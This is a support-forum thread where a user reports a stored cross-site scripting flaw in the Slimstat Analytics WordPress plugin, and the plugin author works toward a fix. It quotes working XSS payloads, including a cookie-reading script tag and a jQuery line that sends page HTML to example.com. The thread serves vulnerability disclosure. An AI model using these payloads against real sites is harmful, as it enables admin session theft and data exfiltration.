Support » Plugin: Slimstat Analytics » XSS Vurnability ?!?!?

  • Resolved xssAlert

    (@xssalert)


    Hello, im found a some prob with two plugins and wordpress,

    what im try :
    ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//– >”>’>

    im put this in commentfield, plugin names “bug libary v.1.2.6)
    and a status of plugin “wp-slimstat v2.8.3”
    iem very sure, that the last plugin run this script. then when im load in admin backend the plugin and show from where the visitors incoming, the plugin run this script and produce the alert window! only this but
    a rly bad man, can do more

    so pls help to find it out
    thx

    http://wordpress.org/extend/plugins/wp-slimstat/

Viewing 15 replies - 1 through 15 (of 22 total)
  • Plugin Author Jason Crouse

    (@coolmann)

    Could you please contact me at

    la buca delle lettere

    to discuss this issue? I was not able to reproduce the issue just by using my plugin. Where did you type the javascript string?

    Thank you,
    Camu

    read top 🙂

    srry for englisch but i can send u screenshot

    i am alrdy contact u over ur site.
    rob

    ach put this code in to search,
    so ur wp-slimstat plugin just load it and execute . where on recent searches 🙂

    iam using last plugins

    Plugin Author Jason Crouse

    (@coolmann)

    I just tried to search for

    ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">'>

    in my local dev environment, but I couldn’t replicate the issue. The string is correctly encoded and so the javascript is not executed. Please elaborate 🙂

    Plugin Author Jason Crouse

    (@coolmann)

    I just sent you a private message to investigate the issue.

    Thank you for reporting it and for helping make WP SlimStat a better product.

    Camu

    <script>alert(document.cookie);</script>

    test it on search
    in your wp search
    then log in and load wp-slimstat overview, there u can see last searches

    so enjoy

    Plugin Author Jason Crouse

    (@coolmann)

    I will release a fix as soon as possible, thank you. Please note though that no sensitive information can be transmitted to a different server, because of JavaScript’s security policies.

    Best
    Camu

    yup, but u can load a “bad code” and load viruses etc

    Plugin Author Jason Crouse

    (@coolmann)

    Okay, this should be fixed now. I will release a new version on Monday. In the meanwhile, would you be interested in testing this new version?

    cheers
    camu

    Please note though that no sensitive information can be transmitted to a different server, because of JavaScript’s security policies.

    That’s not correct. Data can be sent to any external server if you use a search-term like this:

    <script>jQuery('<img/>').attr('src','http://example.com/?data='+jQuery('body').html())</script>

    This would send the whole body HTML to example.com server. There are endless possibilities. This should be fixed ASAP.

    Plugin Author Jason Crouse

    (@coolmann)

    Thanks, Ov3rfly, you make a very good point indeed. This has already been fixed in version 2.8.5, which will be released asap. Are you interested in testing it to make sure the vulnerability has been addressed?

    sure..

    just send me it over mail 🙂 but no virus XD :))

    wordpress should be to fixed, to enable Java script in search box, but no one interesing it , next change to another CMS

    Plugin Author Jason Crouse

    (@coolmann)

    I’ll send it to you as soon as possible, thank you for your help!

    Camu

    Plugin Author Jason Crouse

    (@coolmann)

    Sent it.

    u sent me alrdy 2x that script
    and it seems not fixed. maybe u ask in some forums about disable rendering or what ever

    i cant help u
    your script now deletet

Viewing 15 replies - 1 through 15 (of 22 total)
  • The topic ‘XSS Vurnability ?!?!?’ is closed to new replies.